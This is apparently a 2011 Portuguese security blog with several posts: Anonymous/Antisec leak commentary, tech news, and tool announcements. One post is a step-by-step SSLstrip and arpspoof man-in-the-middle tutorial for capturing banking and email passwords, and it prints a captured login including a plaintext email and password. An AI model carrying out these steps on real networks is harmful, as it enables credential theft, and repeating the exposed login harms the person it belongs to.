domingo, 31 de julho de 2011

Até aonde as operações do Antisec e do Anonymous irão ?

Tivemos centenas de ataques sendo reportados pelo Twitter neste final de semana. Para vocês terem ideia, mais de 70 sites do governo americano foram pichados, vejam a lista nestelink. Além da pichação e do bafafá gerado, tanto o grupo Antisec quanto o Anonymous, autores dos ataques, informaram que conseguiram mais de 10GB de dados, muitos deles tidos como extremamente confidenciais por conterem informações pessoas de polícias e agentes do governo americano como endereço, número de telefone, número do Seguro Social, usuários e senhas.
Ainda pouco, vários destes dados estavam disponíveis no Pastebin para consulta. Uma coisa que me chamou atenção foi o fato do Antisec ter anunciado que conseguiu diversos dados do programa de proteção à testemunhas americano.
Esse programa é responsável por proteger milhares de pessoas nos EUA que testemunharam algum crime executado por perigosos criminosos. Sem este programa de proteção, muita gente perigosa estaria solta e muita gente estaria morta. Ai vem a minha pergunta: Será que a operação #Antisec não foi longe demais ?
Uma coisa é expor a podridão do governo, outra coisa é expor a integridade, a vida das pessoas. Sou completamente contra colocar vidas em risco, e é isso que essa operação tem feito, mas com uma justificativa ridícula de expor a corrupção dos nossos governantes.
O problema que vejo nisso tudo é que são jovens entre 12-18 anos que estão encabeçando este tipo de ataque, de dentro de suas casas quentinhas e com toda a segurança bancada pelos seus pais, sem imaginar que alguém poderá morrer se estes dados capturados nos últimos ataques forem expostos via Internet.

sábado, 30 de julho de 2011

Sslstrip e man-in-the-middle, SSL seguro?

No início desta semana, eu discuti sobre segurança dentro de um Hotel em Vitória. A Outra pessoa teimava em dizer que quando qualquer um acessa um site seguro, com SSL/Certificado digital, nenhum hacker/cracker poderia roubar os seus dados. Eu argumentei que não era bem assim e que há técnicas que possibilitam o roubo de dados, mesmo navegando em sites seguros – SSL.
Eis que o o blog unknownantisec fez um excelente post explicando como executar um ataque Man in the middle em conjunto com a ferramenta SSLstrip, a qual já foi comentada várias vezes no blog.
Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Espero que nenhum de nossos leitores use o conhecimento aqui obtido para causar prejuízos a terceiros, uma vez que escrevi este artigo apenas para fins didáticos e não poderá ser usado como forma de incentivo a criminalidade. O que garante que eu possa passar este conhecimento para você sem está cometendo um crime é o artigo 5º da Constituição Federal que nos garante a Liberdade de Expressão.

Como funciona?

Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.
Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.

Como é feito o ataque

Vou demonstrar como é feito um ataque desses com o sslstrip que já vem no backtrack 5.
para isso entre no diretorio do sslstrip:
#cd /pentest/web/sslstrip
Agora vamos listar as opções do sslstrip:
#python sslstrip.py -h
Ele vai dar as seguintes opções:
sslstrip 0.8 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.
Vamos usar a opção “-w” ou “–write=” para gravar os logs em um arquivo e a “-l” ou “–listen=” para listar a porta de escuta.
Primeiro vamos habilitar ip forward no computador, para que ele possa intender que queremos redirecionar o trafego.
echo "1" > /proc/sys/net/ipv4/ip_forward
Agora vamos redirecionar o tráfego da porta 80 para a 10000 que é onde o sslstrip vai trabalhar.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Vamos colocar o sslstrip para funcionar agora, digite no terminal:
#python sslstrip.py -w trafego -l 10000
Abra outro terminal ou pagina que vamos colocar o arpspoof para funcionar.
Assim que abrir o terminal, digite route para saber qual o seu roteador e qual a placa que está conectada, ficaria assim.
Kernel IP routing table
Destination    Gateway                  Genmask         Flags Metric Ref    Use Iface
10.0.0.0           *                    255.0.0.0       U     0      0      0   eth0
default        10.25.77.254             0.0.0.0         UG    0      0      0   eth0
Ficando assim:
10.25.77.254 é seu router
eth0 é sua placa de rede
Sabendo o que é o que, vamos executar o arpspoof, digite no terminal
#arpspoof -i eth0 10.25.77.254
Para ver as “senhas” basta digitar:
#less trafego
Agora é só garimpar as senhas recolhidas.
Exemplo de pacote capturado
2011-07-28 13:49:19,605 SECURE POST Data (login.live.com):
login=juana%40hotmail.com&passwd=loa1814&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=CSunM4mofYhigqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl
teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpWOg3RhYACZhXqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk
*y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038
Email: juana@hotmail.com
Senha:loa1814

Evitando o Ataque

“Para evitar esse tipo de ataque existe uma ferramenta que detecta algum engraçadinho na rede, chamado ArpON (ARP Handler Inspection), ele é um daemon manipulador que possui ferramentas de vigilância e monitoramento de redes, para assegurar a proteção, além de evitar ataques do tipo Man In The Middle (MITM). ArpON também é capaz de detectar e bloquear ataques mais alarmantes como DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking, SSL/TLS Hijacking e outros. “(Fonte: under-linux)


Relatório de Ataques Web Realizados nos últimos 6 meses

 Imperva acaba de lançar um relatório muito interessante contendo uma análise de mais de 10 milhões de ataques Web que foram realizados nos últimos 6 meses. Este relatório aponta as vítimas/países mais atacados, os tipos de ataques mais utilizados, as vulnerabilidades mais exploradas e até mesmo a metodologia empregada pelos hackers/crackers.
Emprecionante os graficos.

sexta-feira, 29 de julho de 2011

Xeretando o Smart Sign, o aplicativo especial das Apple Stores

Desde o aniversário de 10 anos das Apple Stores, algumas coisas mudaram nas lojas da Apple. A principal é que, ao invés de deixarem terminais de papel com a informação dos produtos, foram substituídos por iPads e um aplicativo criado especialmente para isto, o Smart Sign.

O iPhone Download Blog  foi até uma Apple Store com uma missão: dar uma espiada no Smart Sign. Como os boatos já diziam, o aplicativo não pode ser desligado no botão Home (para impedir que os usuários comecem uma partida de Angry Birds na loja), mas há um gesto secreto para desativá-lo – e o blog não diz qual é.

Uma vez fora do Smart Sign, o site descobriu que não há o ícone da App Store no iPad. Ele olhou os Ajustes do tablet para saber se o software foi desabilitado, mas não encontrou nenhuma dica. Em seguida, descobriu que a Apple exige pelo menos seis perfis instalados para que o app possa funcionar.

Outro detalhe interessante é que a câmera frontal não funciona.

Como já era de se esperar, o aplicativo funciona somente na Apple Store, por meio do Localização de Serviços. Se ele for desabilitado, o programa fecha assim que é aberto. E, com mais um gesto secreto, o iPad reinicia sem motivo algum. O iPhone Download Blog descobriu um outro aplicativo chamado “Self Service”, mas não conseguiu ver o que ele faz.

quinta-feira, 28 de julho de 2011

Apple pode estar preparando versão mais barata do iPad

A Apple já assinou acordos com diversos fornecedores de peças para a próxima atualização do iPad, de acordo com o DigiTimes, e pretende lançar uma nova versão de seu tablet ainda em 2011.

Citando fontes de dentro da indústria, a reportagem afirma que fabricantes de Taiwan já assinaram contratos para fornecer circuitos integrados para o iPad 3.

Contrariando rumores de que o próximo iPad seria uma versão em HD, o DigiTimes afirma que a Apple procura peças mais baratas para conseguir competir com os novos aparelhos que devem chegar ao mercado no segundo semestre de 2011.

É mais provável, porém, que a empresa esteja apenas tentando baratear algumas partes para lançar a próxima geração de tablets no mesmo preço da atual.

Ainda de acordo com os rumores, o anuncio do novo iPad "econômico" pode ser feito junto com o iPhone 5, que deve ser anunciado em setembro.

WPScan, uma ferramenta para verificar e testar a segurança de blogs baseados em wordpress

WPScan é uma daquelas ferramentas que foram desenvolvidas em ruby para realizar um escaner em blogs baseados em wordpress, com um pequeno detalhe, ele também realiza uma série de ataques.
As features do WPScan são:
Username enumeration (from author querystring and location header)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (2220 most popular by default)
Plugin vulnerability enumeration (based on version) (todo)
Plugin enumeration list generation
Other misc WordPress checks (theme name, dir listing, …)
Pré-requisitos para os diversos sistemas operacionais:
Installing on Debian/Ubuntu:
sudo apt-get install libcurl4-gnutls-dev

sudo apt-get install libopenssl-ruby

sudo gem install typhoeus

sudo gem install xml-simple
Installing on other nix: (not tested)
sudo gem install typhoeus

sudo gem install xml-simple
Installing on Windows: (not tested)
gem install typhoeus

gem install xml-simple
Installing on Mac OSX:
sudo gem install typhoeus

sudo gem install xml-simple
Depois é só executar :
svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan
cd wpscan
ruby wpsca.rb

Metasploit Pro 4.0


A Rapid 7 acaba de lançar o Metasploit 4.0 Pro, uma das ferramentas para testes de intrusão mais utilizadas no mundo.O Metasploit se difere das demais ferramentas de testes de intrusão do mercado pelo simples fato dela realizar milhares de testes de intrusão de forma automática e apresentar resultados gráficos e gerenciais.
As novas funcionalidades do Metasploit Pro 4.0 são:
Integrate security risk intelligence
Integrate Metasploit Pro with your security information and event management (SIEM) system to improve your dashboard information
Import scan results from more than a dozen third-party Web application scanners and vulnerability assessment tools to prioritize vulnerabilities and eliminate false positives
Increase productivity in your security team by integrating Metasploit Pro with NeXpose vulnerability management solutions to directly access vulnerabilities that need to be verified
Automate verification of vulnerabilities and reporting through new programming interface and XML results
Document compliance with FISMA reports that map findings to controls and requirements.
Deploy in a way that works for you
Install on Windows, Ubuntu, or Red Hat Enterprise Linux
Provision a VMware image to your data centers with VMware vSphere
Host an Amazon Machine Image (AMI) in Amazon Elastic Compute Cloud (Amazon EC2).
Automate penetration testing steps
Automatically gather evidence with customizable post-exploitation macros
Re-establish dropped shells with persistent sessions and listeners
Replay previously successful attacks to verify remediation
Easily crack encrypted passwords offline
Remotely control Metasploit Pro through a programming Interface (RPC API)
Pull penetration testing reports from Metasploit Pro in an XML format.
O custo de uma licença do Metasploit 4 Pro é estimado em US$ 15.000,00 – eu já pedi uma cotação para um cliente. Você pode conseguir um desconto, mas não é tão simples assim.
A feature mais interessante que foi lançada, em minha opinião, foi que agora é possível utilizar os serviços de cloud computing ofertados pela amazon como base para realização dos testes de intrusão do Metasploit. Imaginem o estrago que dá para fazer ?

quarta-feira, 27 de julho de 2011

Dilma assina MP para prisões preventivas. E agora, os crackers não serão presos?

A nova lei que regulamenta a prisão deve obrigar juízes a rever mais de 200 mil casos em todo o país. Esta é a opinião de especialistas ouvidos pelo G1 sobre as mudanças previstas na Lei 12.403, que altera o Código de Processo Penal e entram em vigor no dia 5 de julho. Para juristas, a norma pode beneficiar presos provisórios e detidos em flagrante.
A partir de agora, a prisão preventiva está proibida para crimes com penas inferiores a 4 anos, como os furtos simples, crimes de dano ao patrimônio público, entre outros, desde que o acusado não seja reincidente. A prisão em flagrante também não servirá mais para manter um suspeito atrás das grades, como hoje acontece. Além disso, os valores para fianças aumentam e serão revertidos, obrigatoriamente, em favor das vítimas de criminosos condenados.
Em resumo
Caso você tenha cometido algum crime e esse tenha uma pena prevista inferior a 4 anos, você ficará todo pimpão em casa. Bonito não ?!
Então Crackers e zoadores da Internet brasileira, preparem-se: Caso vocês tenham feito alguma merda contra alguma empresa ou alguém e isso perante a lei tenha uma pena prevista de até 4 anos, vocês não passarão um dia se quer na cadeia. Não se esqueçam dos mais de 4 recursos, fora os Habeas Corpus e atenuantes que nossas maravilhosas leis brasileiras permitem.
Agora, eu fico me perguntando: gostaria de saber o que os “advogados especialistas em direito digital” irão dizer aos seus clientes que cadeia para quem cometeu um crime digital é coisa do passado ?
Será que é isso mesmo ?!

terça-feira, 26 de julho de 2011

CCDA 640-864 Official Cert Guide, 4th Edition

A Cisco possui uma certificação dedicada para aqueles que desejam se tornar designers de redes. São as pessoas que projetam as redes Cisco das empresas. O interessante da CCDA é que ela não possui pré-requisitos, porém a prova é puxada pois o profissional precisa possuir conhecimentos de um CCNA e de um CCNP.
A Cisco Press lançou um guia muito interessante para essa certificação, o CCDA 640-864 Official Cert Guide, 4th Edition. Os tópicos abordados neste livro são:
Network design methodology
Network structure models
Enterprise LAN and data center design
Enterprise network virtualization
Wireless LAN design
WAN technologies and design
IPv4 and IPv6
RIP, EIGRP, OSPF, and BGP
Route summarization and route filtering
Security solutions
Voice and video design
Network management protocols
Algumas informações da própria Cisco para quem deseja seguir a carreira de um Designer de redes Cisco:
Pass the current CCDA DESGN exam, or
Pass any current CCNA Concentration exam (wireless, or security, or voice, or SP Ops), or
Pass any current 642-XXX Professional level exam, or
Pass any current Cisco Specialist exam (excluding Sales Specialist exams or MeetingPlace Specialist exams or Implementing Cisco Telepresence Installations [ITI] exams), or
Pass any current CCIE Written Exam, or
Pass the current CCDE Written Exam OR current CCDE Practical Exam, or
Pass the Cisco Certified Architect (CCAr) interview AND the CCAr board review to extend lower certifications

segunda-feira, 25 de julho de 2011

The Official Ubuntu Book, 6th Edition

O Wowebook liberou para consulta a sexta edição do guia e/ou bíblia do Ubuntu. Este livro é altamente recomendando para os amantes desta distribuição e para aqueles que desejam aprender mais sobre o mundo Linux. O livro tem o objetivo de passar os seguintes conceitos:
Learn how to customize Ubuntu for home, small business, school, government, and enterprise environments
Learn how to quickly update Ubuntu to new release versions with upgraded applications
Find up-to-the-minute troubleshooting advice from Ubuntu users worldwide from forums and other means to get the help you need quickly
Learn Ubuntu Server installation and administration, including LVM and RAID implementation
Learn how to use Ubuntu One to buy legal music from your favorite artists and how to use cloud storage to back up or share your important files
Learn how you can be a part of the community that creates Ubuntu

sábado, 23 de julho de 2011

NetSecL- Mais uma detribuição linux para galera testa!

Essa semana eu me deparei com uma nova distribuição linux focada em segurança e baseada no OpenSuse. Ele promete ser uma alternativa segura para desktops e servidores, servindo também como base para realização de testes de intrusão. Neste caso, ele roda a partir de um DVD.
Eu particularmente achei a ideia interessante. Realizei alguns testes e vi que essa distribuição é performática, mas falta uma série de ferramentas e features que existem no backtrack.

sexta-feira, 22 de julho de 2011

Um DVD para quem quer aprender segurança em redes Wireless

O pessoal do SecurityTube.net acaba de disponibilizar um DVD contendo mais de 40 vídeos em alta definição explicando como hackear redes Wireless. Os vídeos vão desde o básico até o avançado, são totalmente práticos e têm como objetivo ensinar de fato o que é o segurança em redes Wireless.
Segue a lista dos vídeos:
1 Wireless Lan Security Megaprimer Part 1: Getting Started
2 Wireless Lan Security Megaprimer Part 2: Bands, Channels And Sniffing
3 Wireless Lan Security Megaprimer Part 3: Pwning Beacon Frames
4 Wireless Lan Security Megaprimer Part 4: Dissecting Ap-Client Connections
5 Wireless Lan Security Megaprimer Part 5:Dissecting Wlan Headers
6 Wireless Lan Security Megaprimer Part 6: Pwning Hidden Ssids
7 Wireless Lan Security Megaprimer Part 7: Laughing Off Mac Filters
8 Wireless Lan Security Megaprimer Part 8: Hacking Wlan Authentication
9 Wireless Lan Security Megaprimer Part 9: Hotspot Attacks
10 Wireless Lan Security Megaprimer Part 10: Hacking Isolated Clients
11 Wireless Lan Security Megaprimer Part 11:Alfa Card Kung-Fu
12 Wireless Lan Security Megaprimer Part 12: Man-In-The-Middle Attack
13 Ssl Mitm Attack Over Wireless
14 Ssl Mitm Attack Over Wireless Demo
15 Wireless Lan Security Megaprimer Part 13 : Ssl Man-In-The-Middle Attacks
16 Custom Wireless Regulation Database
17 Wireless Lan Security Megaprimer Part 14: Wep In-Depth
18 Wireless Lan Security Megaprimer Part 15: Wep Cracking
19 Wireless Lan Security Megaprimer Part 16: Caffe Latte Attack Basics
20 Wireless Lan Security Megaprimer Part 17: Caffe Latte Attack Demo
21 Caffe Latte Attack On The Iphone
22 Wireless Lan Security Megaprimer Part 18: Korek’s Chopchop Attack
23 Wireless Lan Security Megaprimer Part 19: Fragmentation And Hirte Attack
24 Wireless Lan Security Megaprimer Part 20: Understanding Wpa/Wpa2
25 Wi-Fi Challenge 1 (Level Easy) : There Is No Patch For Stupidity!
26 Wi-Fi Challenge 1 Solution : There Is No Patch For Stupidity!
27 Wi-Fi Challenge 2 (Level – Intermediate) : Know Thy Packets
28 Wi-Fi Challenge 2 Solution : Know Thy Packets
29 Wi-Fi Challenge 3 (Level Advanced): Never Underestimate Your Enemy!
30 Wireless Lan Security Megaprimer Part 22: Wpa-Psk
31 Wireless Lan Security Megaprimer Part 22: Wpa-Psk Cracking
32 Wireless Lan Security Megaprimer Part 23: Wpa2-Psk Cracking
33 Wireless Lan Security Megaprimer Part 24: Speeding Up Wpa/Wpa2 Psk Cracking
34 Wi-Fi Challenge 3 Solution: Never Underestimate Your Enemy!
35 Wlan Security Megaprimer Part 25: Mood Swings Of A Wandering Client
36 Wlan Security Megaprimer Part 26: Cracking Wpa/Wpa2-Psk With Just The Client
37 Wlan Security Megaprimer: Questions And Answers
38 Wireless Lan Security Megaprimer Part 28: Wpa_Supplicant
39 Wireless Lan Security Megaprimer Challenge 4: Crack Wpa-Personal With Only Ap
40 Wireless Lan Security Megaprimer 29: Setting Up Freeradius-Wpe On Backtrack
41 Wireless Lan Security Megaprimer 30: Eap-Md5 Basics And Demo
42 Wireless Lan Security Megaprimer 31: Cracking Eap-Md5 With Eapmd5Pass And Eapmd5Crack
43 Wireless Lan Security Megaprimer 32: Eap Types And Peap Demo
44 Wireless Lan Security Megaprimer 33: Cracking Peap
45 Wireless Lan Security Megaprimer 34: Cracking Peap In A Windows Network
46 Wireless Lan Security Megaprimer 35: Cracking Eap-Ttls
47 Wireless Lan Security Megaprimer 36: Insecurity In 3Rd Party Wi-Fi Utilities
48 Wireless Lan Security Megaprimer : Conclusion And The Road Ahead
P.S.: Para quem não sabe, o SecurityTube.net é um dos maiores e melhores canais focados em segurança do mundo. Ele possuí centenas de vídeos altamente explicativos e recomendados para quem está começando e para que já está na área há algum tempo.

terça-feira, 19 de julho de 2011

Guia Foca, para quem quer aprender Linux de verdade.

Lembro-me do apostilando e de alguns sites brasileiros que haviam começando, tendo como objetivo a disseminação do conhecimento. Eram poucos, mas com excelente material.
O material que valia a pena estava todo em inglês, e vocês podem tirar o seu cavalinho da chuva com o Google Translator, não havia esta maravilha. Mas em 1999 surge o Guia Foca (FOnte de Consulta e Aprendizado) e o seus guias focados em Linux:
Iniciante
Intermediário
Iniciante+Intermediário
Avançado
Naquela época, só havia o guia básico e o intermediário, mas ambos eram excelentes e esclareciam uma série de dúvidas. Graças a colaboração de milhares de pessoas, o Guia Foca é uma dos melhores guides para quem pensa em aprender ou melhorar os seus conhecimentos em Linux.
Atenção especial de vocês nos capítulos de redes e de restrições de acesso, recursos e serviços. Um prato cheio de informações para quem quer aprender mais sobre segurança da informação no mundo Linux.
P.S.: sei de muito curso de Linux avançado que até hoje é baseado nos Guias do Foca.

quinta-feira, 14 de julho de 2011

Loki, gerador de pacotes e ataques para redes em Python.

Quem aqui nunca precisou de um gerador de pacotes Layer 3 para testar uma nova aplicação ou um novo componente de rede ? Eu já e muito. O Loky nada mais do que isso, um gerador de pacotes Layer 3 com algumas coisitas a mais. Vamos a elas:
Ele foi desenvolvimento e Python, facilitando e muito a sua utilização.
Diversos protocolos layer 3 compatíveis:
ARP
HSRP, HSRPv2
RIP
BGP
OSPF
EIGRP [not-yet-to-be-released due to legal blur]
WLCCP [not-yet-to-be-released due to legal blur]
VRRP, VRRPv3
BFD
LDP
MPLS (re-labeling, tunnel interface)
Ele também gera alguns ataques, são eles:
ARP:
Arp spoofing
Arp scanning
Arp flooding
BFD:
DoS of existing BFD session
BGP:
NLRI injection
EIGRP:
EIGRP TLV injection
Authenticated / Unauthenticated DoS
HSRP, HSRPv2:
IP address take-over
LDP:
Injection of label mapping messages
MPLS:
Rewrite of MPLS labels
MPLS-VPN enabled network stack
OSPF:
Injection of LSAs
MD5 authentication cracking
RIP:
Route injection
TCP-MD5:
RFC2385 authentication cracking
VRRP, VRRPv3:
IP Address take-over
WLCCP:
Winning the WDS master election
Sniffing and cracking of infrastructure authentication (asleap)
Sniffing and generating of CTK nonce and key
Sniffing and decryption of client PMK
Loki trouxe uma série de funcionalidades dos velhos conhecidos Yersinia e Scapy, porém suportando mais pacotes e bem mais simples de se utilizar. target=blank>

segunda-feira, 11 de julho de 2011

Para quem quer aprender a manipular pacotes.

O pessoal que trabalha com redes ou segurança possui um incrível necessidade de aprender a manipular pacotes TCP/IP. Estudam RFCs, A bíblia do TCP/IP e todo e qualquer paper que possa auxiliá-los a chegar no santo graal: controlar a rede com poucos comandos.
Não é uma tarefa nada fácil. Tem gente que acha que analisar com perfeição o matrix gerado pelo Wireshark já é meio caminho andado. Tolinhos.
Eis que para ajudá-los neste processo lhes apresento o hping3 cheatsheet, um dos melhores guias para utilizar o hping3. Quem souber dominar o hping3 estará a poucos passos de distância do santo graal
P.S.: acabei de receber este artigo muito legal e bem escrito de como utilizar o Hping. Escrito pelo @marcos_carraro